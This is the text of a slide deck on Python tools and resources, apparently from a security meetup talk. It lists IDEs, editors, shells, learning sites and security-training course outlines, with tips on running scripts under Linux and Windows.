• Python API to the VirtualBox VM | Allowing you to control every aspect of virtual machine configuration and execution | http://download.virtualbox.org/virtualbox/SDKRef.pdf
• Py2Exe | py2exe is a Python Distutils extension which converts Python scripts into executable Windows programs, able to run without requiring a Python installation. | http://www.py2exe.org/
• Chrome extensions/applications | Various extensions/applications found in the Chrome Webstore |
  • https://chrome.google.com/webstore/detail/gdiimmpmdoofmahingpgabiikimjgcia <-- Python shell (browser button)
  • https://chrome.google.com/webstore/detail/cmlchnlmkdcpelgmkebknjgjgddncelc <-- Python shell (Chrome application)
  • https://chrome.google.com/webstore/detail/nckbgikkpbjdliigbhgjfgfcahhonakp <-- Online Python development environment
Little gems I found
Extra extra credit
Description | Function | Site
• Tweepy | It’s the best working Python library to interface with Twitter (so far) | http://tweepy.github.com/
Tweepy
• Direct message
• Check friends’ timelines
• Create favorites
http://talkfast.org/2010/05/31/twitter-from-the-command-line-in-python-using-oauth
Tips, tricks, etc.
IDE (http://wiki.python.org/moin/IntegratedDevelopmentEnvironments)
• Windows
• PyScripter
• Aptana Studio
• IDLE
• Ninja
• Wing IDE
• Linux
• IDLE
• Geany
• Python Toolkit
• SPE
• ERIC (supposed to have auto-complete of code…)
Editors (http://wiki.python.org/moin/PythonEditors)
• Windows
• Notepad++
• Linux
• Gedit
• SCiTE
Tips, tricks, etc.
Shells
• DreamPie
  • Automatic completion of attributes and file names
  • History box
  • Code box
• IDLE
  • Included with Python install
• IPython
• PyShell
• Guake
Other
• PythonAnywhere
  • http://pythonanywhere.com/
Tips, tricks, etc.
Linux vs. Windows
Linux
• Linux scripts can be run via terminal
  • by calling python <script name>
  • by putting #!/usr/bin/python at the top (path to interpreter) and typing ./<script name>
  • Common problem on PyScripter (awesome Windows Python IDE)… extra code comments are put at the top, then the #!/usr/bin/python (the #! line only works when it is the very first line of the file)
Windows
• Windows scripts don’t need the #! but need to have .py associated with the Python interpreter.
  • Scripts can be double-clicked or run from the command prompt: python <script name>
  • If the script is double-clicked without having raw_input("Press ENTER to exit"), you may not see the output of the script.
Portable Python (Windows only)
• Portable Python is a Python® programming language preconfigured to run directly from any USB storage device, enabling you to have, at any time, a portable programming environment. Just download it, extract to your portable storage device or hard drive and in 10 minutes you are ready to create your next Python® application.
• Portable Python 2.7.2.1 package contains the following applications/libraries:
  • PyScripter v2.4.1
  • NumPy 1.6.0
  • SciPy 0.90
  • Matplotlib 1.0.1
  • PyWin32 216
  • Django 1.3
  • PIL 1.1.7
  • Py2Exe 0.6.9
  • wxPython 2.8.12.0
• Portable Python 3.2.1.1 package contains the following applications/libraries (alphabetical order):
  • NetworkX v1.4
  • PySerial 2.5
  • PyScripter v2.4.1
  • PyWin32 v.216
  • RPyC-3.0.7
Tips, tricks, etc.
Additional resources
Beginners guides from Python
• http://wiki.python.org/moin/BeginnersGuide/NonProgrammers
• http://wiki.python.org/moin/BeginnersGuide/Programmers
Additional resources
Extra tools
• http://mashable.com/2007/10/02/python-toolbox/
Online exercises
• http://codingbat.com/python
• http://homepage.mac.com/s_lott/books/python.html
• http://web.archive.org/web/20110625065328/http://diveintopython.org/toc/index.html
• http://anh.cs.luc.edu/python/hands-on/
• http://code.google.com/edu/languages/google-python-class/index.html
• http://www.cdf.toronto.edu/~csc148h/winter/
• http://www.cdf.toronto.edu/~csc108h/fall/
• http://projecteuler.net/
• http://www.upriss.org.uk/python/PythonCourse.html
• http://www.pythonchallenge.com/
• http://learnpythonthehardway.org/
• http://www.awaretek.com/tutorials.html
• http://www.checkio.org/
• http://www.pyschools.com/
General learning materials
• http://www.py4inf.com/
Free online videos
• http://freevideolectures.com/Course/2512/Python-Programming
• http://showmedo.com/videotutorials/python
• http://www.python.org/doc/av/
• http://thenewboston.org/list.php?cat=36
Additional resources
Online books
• http://en.wikibooks.org/wiki/Python_Programming
Online interactive tutorial/interpreter
• http://www.trypython.org
• http://www.learnpython.org/
• https://languageshells.appspot.com/
Forums
• http://www.python-forum.org
• http://stackoverflow.com/questions/tagged/python
• http://www.daniweb.com/software-development/python/114
Module/package repositories
• http://pypi.python.org/pypi The Python Package Index is a repository of software for the Python
programming language. There are currently 17409 packages here.
• http://code.activestate.com/recipes/ The ActiveState Code Recipes contains 3850 snippets to
learn from and use.
Python tools for penetration testers
• http://www.dirk-loss.de/python-tools.htm
Training
• SecurityTube Python Scripting Expert
• http://securitytube-training.com/certifications/securitytubepython-scripting-expert/?id=main
• Module 1: Python Scripting – Language Essentials
• Module 2: System Programming and Security
• Module 3: Network Security Programming – Sniffers
and Packet Injectors
• Module 4: Attacking Web Applications
• Module 5: Exploitation Techniques
• Module 6: Malware Analysis and Reverse Engineering
• Module 7: Attack Task Automation
• Module 8: Further Study and Roadmap
• Module 9: Exam Pattern and Mock Exam
• PYTHON TRAINING FOR SECURITY PROFESSIONALS
  • http://www.trainace.com/courses/python/
• Log Parsing with Python
• Pcap Parsing with Python
• Network Attack with Python
• Web Application Attack with Python
• Malware Analysis with Python
• Exploit Development with Python
Additional resources
All the scripts
Category | Script
• CSAW Crypto Redux – Challenge 1 to 5
• Extra credit
• Coding for Penetration Testers – part 1
• Coding for Penetration Testers – part 2
• Coding for Penetration Testers – part 3
• Extra extra credit
Etc.
Antigravity
• When you open up ModulesDocs and
click on antigravity module or from IDLE
run import antigravity, a web browser
opens to the XKCD cartoon at the
beginning of this slide deck.
Zen of Python
• To start the path of finding Zen of Python,
remember these two key words…
IMPORT THIS.
• From an IDE (IDLE) or a Python shell,
run import this and the Zen of
Python will be revealed.
Etc.
Final thoughts
Questions?
Keith Dixon
@Tazdrumm3r
#misec – Tazdrumm3r
[email protected]
http://tazdrumm3r.wordpress.com